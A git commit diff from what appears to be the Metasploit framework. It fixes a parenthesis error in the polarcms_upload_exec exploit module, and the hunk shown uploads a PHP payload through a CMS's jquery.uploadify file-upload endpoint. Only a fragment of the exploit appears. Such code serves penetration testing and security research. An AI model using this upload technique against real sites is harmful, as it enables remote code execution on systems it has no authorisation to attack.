Fix polarcms_upload_exec exploit

bug/bundler_fix
Joe Rozner 2013-02-25 22:58:26 -08:00
parent 0158919031
commit abdcde06cd
1 changed files with 1 additions and 1 deletions

View File

@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = Rex::MIME::Message.new
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"")
data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\""))
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({